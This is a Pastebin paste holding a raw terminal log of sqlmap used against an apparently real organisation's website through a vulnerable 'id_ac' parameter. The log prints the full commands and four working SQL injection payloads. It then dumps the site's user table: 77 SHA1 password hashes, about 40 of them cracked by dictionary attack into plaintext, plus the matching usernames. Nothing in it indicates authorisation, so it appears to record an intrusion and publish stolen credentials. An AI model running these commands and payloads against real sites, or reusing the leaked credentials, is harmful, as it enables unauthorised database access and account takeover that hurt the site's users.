API tools faq
paste
Advertisement
cp-pum4

Untitled

cp-pum4
Feb 7th, 2012
305
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 26.32 KB | None | 0 0
raw download clone embed print report
  1. root@cp-pUm4:/pentest/database/sqlmap# ./sqlmap.py -u http://www.brasil.org.bo/ml_age_cul2.php?id_ac=1 -D brasil2 -T Usuario -C usuClave --dump
  2.  
  3. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  4. http://sqlmap.sourceforge.net
  5.  
  6. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
  7.  
  8. [*] starting at: 22:07:48
  9.  
  10. [22:07:48] [INFO] using '/pentest/database/sqlmap/output/www.brasil.org.bo/session' as session file
  11. [22:07:48] [INFO] resuming injection data from session file
  12. [22:07:48] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  13. [22:07:48] [INFO] testing connection to the target url
  14. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  15. ---
  16. Place: GET
  17. Parameter: id_ac
  18. Type: boolean-based blind
  19. Title: AND boolean-based blind - WHERE or HAVING clause
  20. Payload: id_ac=1 AND 3352=3352
  21.  
  22. Type: error-based
  23. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  24. Payload: id_ac=1 AND (SELECT 7137 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,99,102,58),(SELECT (CASE WHEN (7137=7137) THEN 1 ELSE 0 END)),CHAR(58,112,117,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  25.  
  26. Type: UNION query
  27. Title: MySQL UNION query (NULL) - 1 to 10 columns
  28. Payload: id_ac=-4498 UNION ALL SELECT CONCAT(CHAR(58,120,99,102,58),IFNULL(CAST(CHAR(121,101,108,76,79,67,115,75,74,108) AS CHAR),CHAR(32)),CHAR(58,112,117,122,58)), NULL, NULL, NULL, NULL, NULL#
  29.  
  30. Type: AND/OR time-based blind
  31. Title: MySQL > 5.0.11 AND time-based blind
  32. Payload: id_ac=1 AND SLEEP(5)
  33. ---
  34.  
  35. [22:07:49] [INFO] manual usage of GET payloads requires url encoding
  36. [22:07:49] [INFO] the back-end DBMS is MySQL
  37. web server operating system: Linux CentOS 5
  38. web application technology: Apache 2.2.3, PHP 5.1.6
  39. back-end DBMS: MySQL 5.0
  40. do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] Y
  41. [22:07:55] [INFO] fetching columns LIKE 'usuClave' for table 'Usuario' on database 'brasil2'
  42. [22:07:55] [INFO] the SQL query used returns 1 entries
  43. [22:07:56] [INFO] retrieved: "usuClave","varchar(45)"
  44. [22:07:56] [INFO] fetching column(s) 'usuClave' entries for table 'Usuario' on database 'brasil2'
  45. [22:07:57] [INFO] the SQL query used returns 77 entries
  46. [22:07:57] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
  47. [22:07:57] [INFO] retrieved: "b2ffdbeb87e8e6331d350b482b328d309bc5a321"
  48. [22:07:58] [INFO] retrieved: "05d3ce712c27817b2bd914b5795519143e4c5f2f"
  49. [22:07:59] [INFO] retrieved: "a7b33e0a8c65debb4a90481c6e24fa86291d5e80"
  50. [22:07:59] [INFO] retrieved: "80f4744b624046be42b6077e8ba7316b316d0894"
  51. [22:08:00] [INFO] retrieved: "2acce934146755874cdcdda17b1f80b41b27d0f8"
  52. [22:08:00] [INFO] retrieved: "446b01869d5713dfb00e9e45b431c154292f2ec2"
  53. [22:08:01] [INFO] retrieved: " "
  54. [22:08:01] [INFO] retrieved: "8e374bd851a06ce1643ed1663168f00f8af0e461"
  55. [22:08:02] [INFO] retrieved: "1fb3381f4a67bfc2b7766213d411e29c8fca277c"
  56. [22:08:02] [INFO] retrieved: "6dfa9cecb562e345739f2e4eb69e9ebd0fbff687"
  57. [22:08:03] [INFO] retrieved: "2d8d596a0b97569f9226a8c33ed9c6dbc8d88120"
  58. [22:08:04] [INFO] retrieved: "c8c5e409fe246fd2af1025d4aeb63b11b18a7bdf"
  59. [22:08:04] [INFO] retrieved: "d7a9089bf3f52040cec8c19a2efbe72f11ae1cad"
  60. [22:08:05] [INFO] retrieved: "28a38c237f51b0e1bd5538da917a74611635302e"
  61. [22:08:05] [INFO] retrieved: "ef6b07855f2723256770c430aceb3eaac06d6299"
  62. [22:08:06] [INFO] retrieved: "f72faf30d4024ec3f0937f1db15e35ddf8709ddb"
  63. [22:08:06] [INFO] retrieved: "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3"
  64. [22:08:07] [INFO] retrieved: "58454b0abe9174f333fd6f1129c6d26b60f9b310"
  65. [22:08:08] [INFO] retrieved: "e4f88bf4b0c64b69a4393648335f5aa828e322fa"
  66. [22:08:08] [INFO] retrieved: "1315ae6229444367968a943a219f38def9a8112d"
  67. [22:08:09] [INFO] retrieved: " "
  68. [22:08:09] [INFO] retrieved: "58962726f7868e47fa3228f2b0c2714e53f0cf57"
  69. [22:08:10] [INFO] retrieved: "684eea1bd06123b2b2f0e722ae370c1853535208"
  70. [22:08:11] [INFO] retrieved: "3abc5e7d9da514c073e9f6469187092fe3863050"
  71. [22:08:11] [INFO] retrieved: "6954c2eea1e5bfbd2d28cb962e2648611a846aac"
  72. [22:08:12] [INFO] retrieved: "6954c2eea1e5bfbd2d28cb962e2648611a846aac"
  73. [22:08:12] [INFO] retrieved: "39dfa55283318d31afe5a3ff4a0e3253e2045e43"
  74. [22:08:13] [INFO] retrieved: "abe6729cf4a6bd2d81ef0bcdcbeb18c9f4396b8c"
  75. [22:08:14] [INFO] retrieved: "f9bfd018601fb96c95952d697b2d8ec058468649"
  76. [22:08:14] [INFO] retrieved: "64300e9f4a41aca4856f205bd3ac5dfa451b56e5"
  77. [22:08:15] [INFO] retrieved: "e4047b9d284ad4af044fee65e2545f89383b7588"
  78. [22:08:15] [INFO] retrieved: "c2efe46de2297a51be8b3abf1b6e91714fb2108d"
  79. [22:08:16] [INFO] retrieved: "52336104be246289fc8c4a76561d0b4fb825755a"
  80. [22:08:16] [INFO] retrieved: "ff02023dc6d922069eb605c673d0fc96db887687"
  81. [22:08:17] [INFO] retrieved: "f3e04d00715cbbf872c51d67c1527898723fd3a2"
  82. [22:08:17] [INFO] retrieved: "d1c3474da9e0eefa44582e1ca6dbc60be65a0f32"
  83. [22:08:19] [INFO] retrieved: "7110eda4d09e062aa5e4a390b0a572ac0d2c0220"
  84. [22:08:19] [INFO] retrieved: "b2ffdbeb87e8e6331d350b482b328d309bc5a321"
  85. [22:08:20] [INFO] retrieved: "977064207037ba4ce05824b829f77abcf7c0e196"
  86. [22:08:20] [INFO] retrieved: "7d24f63cc0bc4d1d37a4384c9cfc1575c1531f9a"
  87. [22:08:21] [INFO] retrieved: "9a6aa8b8b6919d3b97d0f40c9eda85f5523c7dd2"
  88. [22:08:22] [INFO] retrieved: "d1e0657c64f9506ce5943334e3afcdeace16e6e4"
  89. [22:08:22] [INFO] retrieved: "fdab1230c7beef1895081496cbed2fd4b66ac89a"
  90. [22:08:23] [INFO] retrieved: "ccf5d1afc4ea61dcfd0ab1dd4c2ac76a0f1d4b5b"
  91. [22:08:23] [INFO] retrieved: "a527f45c4d359ddc0a14b8fd7ba6d4b9e5a271c5"
  92. [22:08:24] [INFO] retrieved: "937bfaea6b875d17a48b0e4b499c346e56c4ca1c"
  93. [22:08:25] [INFO] retrieved: "e94f804cc70d3864a8b329ec1b9ed995ba83265a"
  94. [22:08:26] [INFO] retrieved: "7d46e8c50bed3489be816bcebdae8b50576d4f5a"
  95. [22:08:26] [INFO] retrieved: "e79cab55eab4c0a1a63610829a51fd51d5cfb294"
  96. [22:08:27] [INFO] retrieved: "ba46b93b2d133065a9b1a5288bbfbfd66ff46c6c"
  97. [22:08:28] [INFO] retrieved: "20fbb3a711536c098e559c95923751f3b5eea19e"
  98. [22:08:28] [INFO] retrieved: "3ddc24b54a6dd6d219e2647f6002f4a13417780d"
  99. [22:08:29] [INFO] retrieved: "ee4cadababffc267eca2c8e49c9b32fa0dae2c64"
  100. [22:08:30] [INFO] retrieved: "9d1e3c2635ffdace76b6dbce94675c4bbb747825"
  101. [22:08:31] [INFO] retrieved: "8b52b6b714585648fd300da0dbc0fa0678553280"
  102. [22:08:31] [INFO] retrieved: "ec337a44813c32dfd983cca0506395890b8213bb"
  103. [22:08:32] [INFO] retrieved: "2165c91bbc1a84a2c0dc189163f9d8b951d8cb3e"
  104. [22:08:32] [INFO] retrieved: "07e2c65734c5947da89571c512405bb3d72ab3ed"
  105. [22:08:33] [INFO] retrieved: "465e70c5dabfcc7e56c5006537c8682be945296c"
  106. [22:08:33] [INFO] retrieved: "fc6fea5b0c058716683a5ec0cf63833ba7a72bca"
  107. [22:08:34] [INFO] retrieved: "622ed1c03ff2cd169027503dc4835d7f3175f10e"
  108. [22:08:35] [INFO] retrieved: "9d12d9368b29612ff2f8ba55de78c4bf2ac03d8e"
  109. [22:08:35] [INFO] retrieved: "354cd6a96cc0a7013a18f69b52f937f484a661ad"
  110. [22:08:36] [INFO] retrieved: "32600d50b1abd85e1f2f9ddb141cb611d8e159d8"
  111. [22:08:36] [INFO] retrieved: "5462a3f5a6e49d750a5557cd3e89fd6862b56ad1"
  112. [22:08:37] [INFO] retrieved: "d7a9089bf3f52040cec8c19a2efbe72f11ae1cad"
  113. [22:08:37] [INFO] retrieved: "abf91baa2f6ce70c7a8d641e9f6eaa7076b6e21f"
  114. [22:08:38] [INFO] retrieved: "eb01d8f828a6c9a20be4534e72e049aaf41503df"
  115. [22:08:39] [INFO] retrieved: "4bf35f37a90e723b5f0a9024a7be0ec8a5176069"
  116. [22:08:39] [INFO] retrieved: "cbe5f67537f7a23de89e3cf559866386c6ece7a4"
  117. [22:08:40] [INFO] retrieved: "0d89e18e802e9054907596bf2c5a60db164d9a84"
  118. [22:08:40] [INFO] retrieved: "6d3bf83d679e76904d0672936bc24326f8e6bbb8"
  119. [22:08:41] [INFO] retrieved: "65959530c678d1d49e1a5d287ef32d32ec7e1288"
  120. [22:08:42] [INFO] retrieved: "e255b5f19aa5e14664a7f13d00662d521a3035e0"
  121. [22:08:42] [INFO] retrieved: "b5fcef502742dea91311c7f8b4f63518c8b9b624"
  122. [22:08:43] [INFO] retrieved: "5f58355136bb5e7f8fcc597feb42380ccd1ad286"
  123. [22:08:43] [INFO] retrieved: "722918b8856f7d7ff38fbcbccaf187fce8413e14"
  124. recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] Y
  125. [22:08:50] [INFO] using hash method: 'sha1_generic_passwd'
  126. what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
  127. [22:08:53] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
  128. do you want to use common password suffixes? (slow!) [y/N] N
  129. [22:08:58] [INFO] starting dictionary attack (sha1_generic_passwd)
  130. [22:08:58] [INFO] found: '0000' for hash: '39dfa55283318d31afe5a3ff4a0e3253e2045e43'
  131. [22:08:58] [INFO] found: '1234' for hash: '7110eda4d09e062aa5e4a390b0a572ac0d2c0220'
  132. [22:08:59] [INFO] found: '1956' for hash: '0d89e18e802e9054907596bf2c5a60db164d9a84'
  133. [22:09:02] [INFO] found: 'aida' for hash: 'ba46b93b2d133065a9b1a5288bbfbfd66ff46c6c'
  134. [22:09:03] [INFO] found: 'alfredo' for hash: 'a527f45c4d359ddc0a14b8fd7ba6d4b9e5a271c5'
  135. [22:09:03] [INFO] found: 'amos' for hash: 'eb01d8f828a6c9a20be4534e72e049aaf41503df'
  136. [22:09:03] [INFO] found: 'andreia' for hash: 'c2efe46de2297a51be8b3abf1b6e91714fb2108d'
  137. [22:09:06] [INFO] found: 'brasil' for hash: 'e4f88bf4b0c64b69a4393648335f5aa828e322fa'
  138. [22:09:07] [INFO] found: 'cae' for hash: '9d12d9368b29612ff2f8ba55de78c4bf2ac03d8e'
  139. [22:09:07] [INFO] found: 'caff' for hash: '684eea1bd06123b2b2f0e722ae370c1853535208'
  140. [22:09:07] [INFO] found: 'carlito' for hash: 'e4047b9d284ad4af044fee65e2545f89383b7588'
  141. [22:09:07] [INFO] found: 'celso' for hash: 'd1e0657c64f9506ce5943334e3afcdeace16e6e4'
  142. [22:09:09] [INFO] found: 'costa' for hash: '4bf35f37a90e723b5f0a9024a7be0ec8a5176069'
  143. [22:09:09] [INFO] found: 'cultural' for hash: '5f58355136bb5e7f8fcc597feb42380ccd1ad286'
  144. [22:09:13] [INFO] found: 'francis' for hash: '1fb3381f4a67bfc2b7766213d411e29c8fca277c'
  145. [22:09:13] [INFO] found: 'francisco' for hash: '1315ae6229444367968a943a219f38def9a8112d'
  146. [22:09:13] [INFO] found: 'giovana' for hash: '5462a3f5a6e49d750a5557cd3e89fd6862b56ad1'
  147. [22:09:17] [INFO] found: 'julio' for hash: '52336104be246289fc8c4a76561d0b4fb825755a'
  148. [22:09:20] [INFO] found: 'luci' for hash: 'a7b33e0a8c65debb4a90481c6e24fa86291d5e80'
  149. [22:09:20] [INFO] found: 'lucia' for hash: 'f9bfd018601fb96c95952d697b2d8ec058468649'
  150. [22:09:20] [INFO] found: 'luciene' for hash: '58454b0abe9174f333fd6f1129c6d26b60f9b310'
  151. [22:09:20] [INFO] found: 'magda' for hash: '9d1e3c2635ffdace76b6dbce94675c4bbb747825'
  152. [22:09:21] [INFO] found: 'manolito' for hash: '65959530c678d1d49e1a5d287ef32d32ec7e1288'
  153. [22:09:22] [INFO] found: 'moises' for hash: 'abe6729cf4a6bd2d81ef0bcdcbeb18c9f4396b8c'
  154. [22:09:23] [INFO] found: 'octavio' for hash: '7d24f63cc0bc4d1d37a4384c9cfc1575c1531f9a'
  155. [22:09:23] [INFO] found: 'olga' for hash: 'd7a9089bf3f52040cec8c19a2efbe72f11ae1cad'
  156. [22:09:24] [INFO] found: 'padova' for hash: 'f3e04d00715cbbf872c51d67c1527898723fd3a2'
  157. [22:09:25] [INFO] found: 'rafael' for hash: '2d8d596a0b97569f9226a8c33ed9c6dbc8d88120'
  158. [22:09:26] [INFO] found: 'raul' for hash: '8b52b6b714585648fd300da0dbc0fa0678553280'
  159. [22:09:26] [INFO] found: 'rodrigo' for hash: '6dfa9cecb562e345739f2e4eb69e9ebd0fbff687'
  160. [22:09:26] [INFO] found: 'rojas' for hash: 'fc6fea5b0c058716683a5ec0cf63833ba7a72bca'
  161. [22:09:26] [INFO] found: 'rosana' for hash: 'cbe5f67537f7a23de89e3cf559866386c6ece7a4'
  162. [22:09:27] [INFO] found: 'ruy' for hash: 'c8c5e409fe246fd2af1025d4aeb63b11b18a7bdf'
  163. [22:09:27] [INFO] found: 'santos' for hash: '937bfaea6b875d17a48b0e4b499c346e56c4ca1c'
  164. [22:09:28] [INFO] found: 'souza' for hash: 'f72faf30d4024ec3f0937f1db15e35ddf8709ddb'
  165. [22:09:29] [INFO] found: 'test' for hash: 'a94a8fe5ccb19ba61c4c0873d391e987982fbbd3'
  166. [22:09:30] [INFO] found: 'vicky' for hash: 'e79cab55eab4c0a1a63610829a51fd51d5cfb294'
  167. [22:09:31] [INFO] found: 'wilson' for hash: 'b2ffdbeb87e8e6331d350b482b328d309bc5a321'
  168. [22:09:31] [INFO] found: 'wolfgang' for hash: 'ec337a44813c32dfd983cca0506395890b8213bb'
  169. Database: brasil2
  170. Table: Usuario
  171. [73 entries]
  172. +------------------------------------------------------+
  173. | usuClave |
  174. +------------------------------------------------------+
  175. | 2acce934146755874cdcdda17b1f80b41b27d0f8 |
  176. | 58454b0abe9174f333fd6f1129c6d26b60f9b310 (luciene) |
  177. | 446b01869d5713dfb00e9e45b431c154292f2ec2 |
  178. | 1315ae6229444367968a943a219f38def9a8112d (francisco) |
  179. | 52336104be246289fc8c4a76561d0b4fb825755a (julio) |
  180. | e79cab55eab4c0a1a63610829a51fd51d5cfb294 (vicky) |
  181. | cbe5f67537f7a23de89e3cf559866386c6ece7a4 (rosana) |
  182. | ee4cadababffc267eca2c8e49c9b32fa0dae2c64 |
  183. | 684eea1bd06123b2b2f0e722ae370c1853535208 (caff) |
  184. | 9d12d9368b29612ff2f8ba55de78c4bf2ac03d8e (cae) |
  185. | f9bfd018601fb96c95952d697b2d8ec058468649 (lucia) |
  186. | f3e04d00715cbbf872c51d67c1527898723fd3a2 (padova) |
  187. | 8b52b6b714585648fd300da0dbc0fa0678553280 (raul) |
  188. | e4f88bf4b0c64b69a4393648335f5aa828e322fa (brasil) |
  189. | 6d3bf83d679e76904d0672936bc24326f8e6bbb8 |
  190. | 05d3ce712c27817b2bd914b5795519143e4c5f2f |
  191. | b2ffdbeb87e8e6331d350b482b328d309bc5a321 (wilson) |
  192. | 28a38c237f51b0e1bd5538da917a74611635302e |
  193. | ccf5d1afc4ea61dcfd0ab1dd4c2ac76a0f1d4b5b |
  194. | 5462a3f5a6e49d750a5557cd3e89fd6862b56ad1 (giovana) |
  195. | eb01d8f828a6c9a20be4534e72e049aaf41503df (amos) |
  196. | 977064207037ba4ce05824b829f77abcf7c0e196 |
  197. | NULL |
  198. | 6dfa9cecb562e345739f2e4eb69e9ebd0fbff687 (rodrigo) |
  199. | 07e2c65734c5947da89571c512405bb3d72ab3ed |
  200. | e94f804cc70d3864a8b329ec1b9ed995ba83265a |
  201. | abe6729cf4a6bd2d81ef0bcdcbeb18c9f4396b8c (moises) |
  202. | 465e70c5dabfcc7e56c5006537c8682be945296c |
  203. | e255b5f19aa5e14664a7f13d00662d521a3035e0 |
  204. | 9d1e3c2635ffdace76b6dbce94675c4bbb747825 (magda) |
  205. | 7d46e8c50bed3489be816bcebdae8b50576d4f5a |
  206. | 7d24f63cc0bc4d1d37a4384c9cfc1575c1531f9a (octavio) |
  207. | ec337a44813c32dfd983cca0506395890b8213bb (wolfgang) |
  208. | 937bfaea6b875d17a48b0e4b499c346e56c4ca1c (santos) |
  209. | 4bf35f37a90e723b5f0a9024a7be0ec8a5176069 (costa) |
  210. | 3ddc24b54a6dd6d219e2647f6002f4a13417780d |
  211. | d7a9089bf3f52040cec8c19a2efbe72f11ae1cad (olga) |
  212. | fdab1230c7beef1895081496cbed2fd4b66ac89a |
  213. | f72faf30d4024ec3f0937f1db15e35ddf8709ddb (souza) |
  214. | 39dfa55283318d31afe5a3ff4a0e3253e2045e43 (0000) |
  215. | 354cd6a96cc0a7013a18f69b52f937f484a661ad |
  216. | e4047b9d284ad4af044fee65e2545f89383b7588 (carlito) |
  217. | abf91baa2f6ce70c7a8d641e9f6eaa7076b6e21f |
  218. | ba46b93b2d133065a9b1a5288bbfbfd66ff46c6c (aida) |
  219. | 65959530c678d1d49e1a5d287ef32d32ec7e1288 (manolito) |
  220. | 6954c2eea1e5bfbd2d28cb962e2648611a846aac |
  221. | 5f58355136bb5e7f8fcc597feb42380ccd1ad286 (cultural) |
  222. | 3abc5e7d9da514c073e9f6469187092fe3863050 |
  223. | ff02023dc6d922069eb605c673d0fc96db887687 |
  224. | 0d89e18e802e9054907596bf2c5a60db164d9a84 (1956) |
  225. | 2165c91bbc1a84a2c0dc189163f9d8b951d8cb3e |
  226. | 20fbb3a711536c098e559c95923751f3b5eea19e |
  227. | a94a8fe5ccb19ba61c4c0873d391e987982fbbd3 (test) |
  228. | 7110eda4d09e062aa5e4a390b0a572ac0d2c0220 (1234) |
  229. | 8e374bd851a06ce1643ed1663168f00f8af0e461 |
  230. | 80f4744b624046be42b6077e8ba7316b316d0894 |
  231. | d1e0657c64f9506ce5943334e3afcdeace16e6e4 (celso) |
  232. | a527f45c4d359ddc0a14b8fd7ba6d4b9e5a271c5 (alfredo) |
  233. | 622ed1c03ff2cd169027503dc4835d7f3175f10e |
  234. | 2d8d596a0b97569f9226a8c33ed9c6dbc8d88120 (rafael) |
  235. | d1c3474da9e0eefa44582e1ca6dbc60be65a0f32 |
  236. | a7b33e0a8c65debb4a90481c6e24fa86291d5e80 (luci) |
  237. | b5fcef502742dea91311c7f8b4f63518c8b9b624 |
  238. | fc6fea5b0c058716683a5ec0cf63833ba7a72bca (rojas) |
  239. | 64300e9f4a41aca4856f205bd3ac5dfa451b56e5 |
  240. | ef6b07855f2723256770c430aceb3eaac06d6299 |
  241. | 58962726f7868e47fa3228f2b0c2714e53f0cf57 |
  242. | 9a6aa8b8b6919d3b97d0f40c9eda85f5523c7dd2 |
  243. | 1fb3381f4a67bfc2b7766213d411e29c8fca277c (francis) |
  244. | c8c5e409fe246fd2af1025d4aeb63b11b18a7bdf (ruy) |
  245. | 32600d50b1abd85e1f2f9ddb141cb611d8e159d8 |
  246. | 722918b8856f7d7ff38fbcbccaf187fce8413e14 |
  247. | c2efe46de2297a51be8b3abf1b6e91714fb2108d (andreia) |
  248. +------------------------------------------------------+
  249.  
  250. [22:09:32] [INFO] Table 'brasil2.Usuario' dumped to CSV file '/pentest/database/sqlmap/output/www.brasil.org.bo/dump/brasil2/Usuario.csv'
  251. [22:09:32] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/www.brasil.org.bo'
  252.  
  253. [*] shutting down at: 22:09:32
  254.  
  255. root@cp-pUm4:/pentest/database/sqlmap# ./sqlmap.py -u http://www.brasil.org.bo/ml_age_cul2.php?id_ac=1 -D brasil2 -T Usuario -C usuNombre --dump
  256.  
  257. sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
  258. http://sqlmap.sourceforge.net
  259.  
  260. [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.
  261.  
  262. [*] starting at: 22:12:43
  263.  
  264. [22:12:43] [INFO] using '/pentest/database/sqlmap/output/www.brasil.org.bo/session' as session file
  265. [22:12:43] [INFO] resuming injection data from session file
  266. [22:12:43] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
  267. [22:12:43] [INFO] testing connection to the target url
  268. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  269. ---
  270. Place: GET
  271. Parameter: id_ac
  272. Type: boolean-based blind
  273. Title: AND boolean-based blind - WHERE or HAVING clause
  274. Payload: id_ac=1 AND 3352=3352
  275.  
  276. Type: error-based
  277. Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
  278. Payload: id_ac=1 AND (SELECT 7137 FROM(SELECT COUNT(*),CONCAT(CHAR(58,120,99,102,58),(SELECT (CASE WHEN (7137=7137) THEN 1 ELSE 0 END)),CHAR(58,112,117,122,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
  279.  
  280. Type: UNION query
  281. Title: MySQL UNION query (NULL) - 1 to 10 columns
  282. Payload: id_ac=-4498 UNION ALL SELECT CONCAT(CHAR(58,120,99,102,58),IFNULL(CAST(CHAR(121,101,108,76,79,67,115,75,74,108) AS CHAR),CHAR(32)),CHAR(58,112,117,122,58)), NULL, NULL, NULL, NULL, NULL#
  283.  
  284. Type: AND/OR time-based blind
  285. Title: MySQL > 5.0.11 AND time-based blind
  286. Payload: id_ac=1 AND SLEEP(5)
  287. ---
  288.  
  289. [22:12:44] [INFO] manual usage of GET payloads requires url encoding
  290. [22:12:44] [INFO] the back-end DBMS is MySQL
  291. web server operating system: Linux CentOS 5
  292. web application technology: Apache 2.2.3, PHP 5.1.6
  293. back-end DBMS: MySQL 5.0
  294. do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n]
  295. [22:12:51] [INFO] fetching columns LIKE 'usuNombre' for table 'Usuario' on database 'brasil2'
  296. [22:12:51] [INFO] the SQL query used returns 1 entries
  297. [22:12:52] [INFO] retrieved: "usuNombre","varchar(100)"
  298. [22:12:52] [INFO] fetching column(s) 'usuNombre' entries for table 'Usuario' on database 'brasil2'
  299. [22:12:52] [INFO] read from file '/pentest/database/sqlmap/output/www.brasil.org.bo/session': 77
  300. [22:12:52] [INFO] the SQL query used returns 77 entries
  301. [22:12:52] [INFO] suppressing possible resume console info because of large number of rows (might take too much time)
  302. [22:12:53] [INFO] retrieved: "zoila"
  303. [22:12:53] [INFO] retrieved: "wilson"
  304. [22:12:53] [INFO] retrieved: "vivi"
  305. [22:12:54] [INFO] retrieved: "virginia"
  306. [22:12:54] [INFO] retrieved: "vicky"
  307. [22:12:55] [INFO] retrieved: "trinidad"
  308. [22:12:55] [INFO] retrieved: "toiney"
  309. [22:12:56] [INFO] retrieved: "test"
  310. [22:12:56] [INFO] retrieved: "silvia"
  311. [22:12:57] [INFO] retrieved: "silva"
  312. [22:12:57] [INFO] retrieved: "selma"
  313. [22:12:57] [INFO] retrieved: "sandrab"
  314. [22:12:58] [INFO] retrieved: "sandra"
  315. [22:12:58] [INFO] retrieved: "ruy"
  316. [22:12:59] [INFO] retrieved: "ruddy"
  317. [22:12:59] [INFO] retrieved: "rosana"
  318. [22:13:00] [INFO] retrieved: "Roldao"
  319. [22:13:00] [INFO] retrieved: "rodrigo"
  320. [22:13:01] [INFO] retrieved: "rita"
  321. [22:13:01] [INFO] retrieved: "raul"
  322. [22:13:02] [INFO] retrieved: "ramon"
  323. [22:13:02] [INFO] retrieved: "rafael"
  324. [22:13:03] [INFO] retrieved: "pedromaciel"
  325. [22:13:03] [INFO] retrieved: "paulo"
  326. [22:13:04] [INFO] retrieved: "patricia"
  327. [22:13:04] [INFO] retrieved: "osilva"
  328. [22:13:05] [INFO] retrieved: "omar"
  329. [22:13:05] [INFO] retrieved: "olga"
  330. [22:13:05] [INFO] retrieved: "octavio"
  331. [22:13:06] [INFO] retrieved: "NOVO REGISTRO"
  332. [22:13:06] [INFO] retrieved: "murilo"
  333. [22:13:07] [INFO] retrieved: "moises"
  334. [22:13:11] [INFO] retrieved: "miguel"
  335. [22:13:11] [INFO] retrieved: "mery"
  336. [22:13:12] [INFO] retrieved: "mauricio"
  337. [22:13:12] [INFO] retrieved: "mario"
  338. [22:13:13] [INFO] retrieved: "marcoantonio"
  339. [22:13:13] [INFO] retrieved: "marcia"
  340. [22:13:13] [INFO] retrieved: "magda"
  341. [22:13:14] [INFO] retrieved: "luisalberto"
  342. [22:13:14] [INFO] retrieved: "luciav"
  343. [22:13:15] [INFO] retrieved: "lucia"
  344. [22:13:15] [INFO] retrieved: "lmaman"
  345. [22:13:16] [INFO] retrieved: "lina"
  346. [22:13:16] [INFO] retrieved: "lhybar"
  347. [22:13:17] [INFO] retrieved: "julio"
  348. [22:13:17] [INFO] retrieved: "juanlucio"
  349. [22:13:18] [INFO] retrieved: "juaneduardo"
  350. [22:13:18] [INFO] retrieved: "jroberto"
  351. [22:13:18] [INFO] retrieved: "josemarcos"
  352. [22:13:19] [INFO] retrieved: "joaquim"
  353. [22:13:19] [INFO] retrieved: "javierz"
  354. [22:13:20] [INFO] retrieved: "jandre"
  355. [22:13:20] [INFO] retrieved: "jandiara"
  356. [22:13:21] [INFO] retrieved: "gonzalo"
  357. [22:13:21] [INFO] retrieved: "gjordan"
  358. [22:13:22] [INFO] retrieved: "giovana"
  359. [22:13:22] [INFO] retrieved: "evandro"
  360. [22:13:23] [INFO] retrieved: "eumar"
  361. [22:13:23] [INFO] retrieved: "eloi"
  362. [22:13:23] [INFO] retrieved: "corina"
  363. [22:13:24] [INFO] retrieved: "Contagem de Estoque"
  364. [22:13:24] [INFO] retrieved: "claudia"
  365. [22:13:25] [INFO] retrieved: "chossi"
  366. [22:13:25] [INFO] retrieved: "celso"
  367. [22:13:26] [INFO] retrieved: "carlos alberto"
  368. [22:13:26] [INFO] retrieved: "carlos"
  369. [22:13:27] [INFO] retrieved: "carlito"
  370. [22:13:27] [INFO] retrieved: "carla"
  371. [22:13:27] [INFO] retrieved: "beymar"
  372. [22:13:28] [INFO] retrieved: "azucena"
  373. [22:13:28] [INFO] retrieved: "aurelio"
  374. [22:13:29] [INFO] retrieved: "andreia"
  375. [22:13:29] [INFO] retrieved: "anamaria"
  376. [22:13:30] [INFO] retrieved: "alfredo"
  377. [22:13:30] [INFO] retrieved: "Administra\xe7\xe0o"
  378. [22:13:31] [INFO] retrieved: ""
  379. Database: brasil2
  380. Table: Usuario
  381. [77 entries]
  382. +---------------------+
  383. | usuNombre |
  384. +---------------------+
  385. | julio |
  386. | mery |
  387. | evandro |
  388. | alfredo |
  389. | juanlucio |
  390. | azucena |
  391. | rosana |
  392. | javierz |
  393. | carlito |
  394. | carla |
  395. | rodrigo |
  396. | josemarcos |
  397. | trinidad |
  398. | jandiara |
  399. | giovana |
  400. | wilson |
  401. | jroberto |
  402. | marcia |
  403. | silvia |
  404. | celso |
  405. | jandre |
  406. | patricia |
  407. | luciav |
  408. | eumar |
  409. | paulo |
  410. | joaquim |
  411. | juaneduardo |
  412. | carlos alberto |
  413. | magda |
  414. | beymar |
  415. | test |
  416. | NOVO REGISTRO |
  417. | eloi |
  418. | osilva |
  419. | gonzalo |
  420. | rita |
  421. | omar |
  422. | murilo |
  423. | gjordan |
  424. | mauricio |
  425. | pedromaciel |
  426. | anamaria |
  427. | claudia |
  428. | selma |
  429. | silva |
  430. | ramon |
  431. | virginia |
  432. | mario |
  433. | zoila |
  434. | ruy |
  435. | luisalberto |
  436. | sandrab |
  437. | sandra |
  438. | raul |
  439. | andreia |
  440. | moises |
  441. | lucia |
  442. | lina |
  443. | toiney |
  444. | Contagem de Estoque |
  445. | vivi |
  446. | olga |
  447. | chossi |
  448. | lhybar |
  449. | lmaman |
  450. | aurelio |
  451. | miguel |
  452. | ruddy |
  453. | marcoantonio |
  454. | corina |
  455. | Administra\xe7\xe0o |
  456. | vicky |
  457. | octavio |
  458. | rafael |
  459. | carlos |
